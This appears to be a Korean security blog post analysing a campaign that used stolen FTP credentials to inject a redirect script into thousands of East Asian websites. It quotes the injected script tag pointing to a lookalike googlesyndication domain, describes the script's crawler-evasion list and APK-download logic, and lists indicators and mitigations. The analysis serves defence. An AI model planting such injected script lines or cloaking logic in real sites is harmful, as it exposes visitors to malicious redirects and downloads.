꼰머의 보안공부

1. 개요

- 동아시아 사용자들이 주로 방문하는 웹사이트 수천 개가 침해

※ 최소 10,000개의 웹사이트를 손상시켰으며, 대부분은 중소기업이나 개인이 운영하는 사이트며, 대기업에서 운영하는 사이트도 일부 존재

- 이 사이트들에 접속하려 하면 방문자들은 해당 사이트가 아니라 성인 또는 도박 사이트로 리디렉션

- 2022.09부터 시작된 것으로 보이며, 공격자들은 FTP 크리덴셜을 활용

- 크리덴셜 정보를 탈취한 경로와 초기 웹 서버에 접속하는 방식 등 공격 백터를 특정하지 못했으나, 공격이 지속되어 공개

1.1 리다이렉션

- 리다이렉션: 이용자가 A가 웹 사이트 B에 접속 시 작업, 오류 등의 사유로 이용자 A를제 3의 사이트 C로 이동시키는 것

> 목적 사이트를 결정하기 위해 신뢰되지 않은 데이터를 사용하고, 이에 대한 적절한 검증이 없을 경우

> 공격자가 조작한 성인, 피싱, 악성 사이트 등으로 리다이렉트되는 취약점

2. 분석

- 공격자들은 사이버 공격을 통해 취득된 정당한 FTP 자격 정보를 이용해 이용자들을 2022.09부터 성인 또는 도박 사이트로 리다이렉션

- 호스팅 업체와 웹사이트 구축에 사용된 기술의 차이로 공격자들이 어떤 식으로 침해하는지 밝혀내는 것이 어려웠음

- 침해된 웹 사이트의 경우 다음 2가지 공통점을 가짐

① 중국 또는 다른 곳에서 호스팅 되지만 중국 관객을 대상으로 서비스
② FTP 포트(21)가 열려 있는 서버 또는 다른 FTP 엔드포인트를 통해 접근

2.1 공격 방식

- 동아시아에서 호스트되고 있는 Azure Web Apps 중에 사용자를 성인용 웹사이트로 리디렉션하는 몇 가지 부정 액세스가 확인됨

- 브루트포스 등 취약한 계정을 사용한 FTP 서버에 접속해 웹 페이지 변경을 수행한 것으로 판단됨.

- 관련 FTP 로그를 분석해 본 결과, 172.81.104[.]64부터의 접근이 확인됨.

※ 중국 IP를 가진 허니팟을 구성한 결과, 해당 IP로 부터의 접근이 다수 확인

- 피해 웹사이트접속시 원격에 호스팅 되어 있는 자바스크립트를 다운하는 HTML 코드가 한 줄씩 추가되어 있었음.

※ tpc[.]googlesyndication[.]com(페이지내 표시된 광고를 클릭했을 경우 발생되는 트래픽) 등 정규 서비스로 위장

※ 하위 도메인 com을 다른 도메인으로 변경

<script type="text/javascript" src="https://tpc.googlesyndication[.]wiki/sodar/sodar2.js"></script>

- 자바 스크립트의 경우 다음 2가지의 공통점을 가짐

① 자바스크립트 실행을 동아시아 특정 국가에서 접속한 사용자로 제한

② User-Agent와 Refferes를 참조 및 웹 크롤러 목록과 대조해 크롤러를 사용한 경우 해당 요청 무시

- 자바스크립트 유포 사이트는 정상 URL과 유사한 형태로 목록은 다음과 같음

※ 취소선이 표시된 경우 현재는 Offline

※ 정상 사이트와 비교 표

2.2 리다이렉션 스크립트

- 자바스크립트는 동작 조건는 다음과 같음

① 스크립트가 실행되면 0~1의 난수가 계산되며, 난수가 확률치보다 작은 경우 cookie를 설정한 후 srcAddress에 나열된 웹 사이트로 리다이렉션

※ 해당 cookie는 24시간 후 만료되도록 설정됨

② 이미 cookie가 설정된 사용자가 접근할 경우 즉시 srcAddress에 나열된 웹 사이트로 리다이렉션

③ 사용자가 모바일로 접속하고, 몇 가지 조건을 충족시키면 downloadSrc 필드에 나열된 리소스로 리디렉션되어 앱 다운

※ 조건 1: 안드로이드 브라우저(모바일용 웹 브라우저) 사용

※ 조건 2: config.androidApk 플래그가 스크립트로 활성화된 경우

④ User-Agent헤더 값을 알려진 웹 크롤러 목록과 비교하여 웹 크롤러인 경우 해당 요청 무시

※ User-Agent헤더 값이 알려진 웹 크롤러이며, Refferes헤더 값이 알려진 웹 브라우저일 경우 리다이렉션되지 않음

※ 스크립트에 표시된 크롤러 목록

bot|googlebot|crawler|spider|robot|crawling|Bytespider|Googlebot|Baiduspider|MSN Bot\/Bingbot|Yandex Bot|Soso Spider|Sosospider|Sogou Spider|360Spider|Yahoo! Slurp China|Yahoo!|YoudaoBot|YodaoBot|Sogou News Spider|msnbot|msnbot-media|bingbot|YisouSpider|ia_archiver|EasouSpider|JikeSpider|EtaoSpider|SemrushBot

2.3 중간 경유지

- 정상 URL과 유사한 형태로 목록은 다음과 같음

※ 리다이렉션은 직접 이루어졌으나, 현재는 중간 경유지를 통해 리다이렉션됨

2.4 리다이렉션 사이트

- alibod1[.]com, 22332299[.]com, alibb1[.]xyz, alibb2[.]xyz이 있으며, 각종 도박 사이트 광고가 표시되고 팝업이 발생

3. 대응방안

① FTP(FTP 또는 SFTP)를 통해 웹사이트를 관리할 경우 강력한 사용자 이름과 패스워드 조합으로 사용할 것을 권장

② 계정 탈취 가능성이 존재하므로, 계정 변경

③ FTP를 사용해야하는 경우 FTPS 또는 SFTP로 전환

※ FTPS: 기존의 FTP에 전송 계층 보안(TLS)과 보안 소켓 계층(SSL) 암호화 프로토콜에 대한 지원이 추가된 것

※ SFTP: SSH File Transfer Protocol'의 약자로, 암호화를 통해 데이터를 안전하게 전송(일반 텍스트 파일은 전송되지 않음)

※ 차이점: FTPS는 인증서를 이용한 FTP+SSL 구성이며, SFTP는 SSH를 이용함

④ 최신 버전의 소프트웨어, 보안 프로그램등을 사용

⑤ 웹 소스 리뷰

⑥ 보안 장비 IoC 적용

4. 참고

[1] https://www.securityweek.com/thousands-of-websites-hijacked-using-compromised-ftp-credentials/
[2] https://www.wiz.io/blog/redirection-roulette
[3] https://www.boannews.com/media/view.asp?idx=114867&page=1&kind=1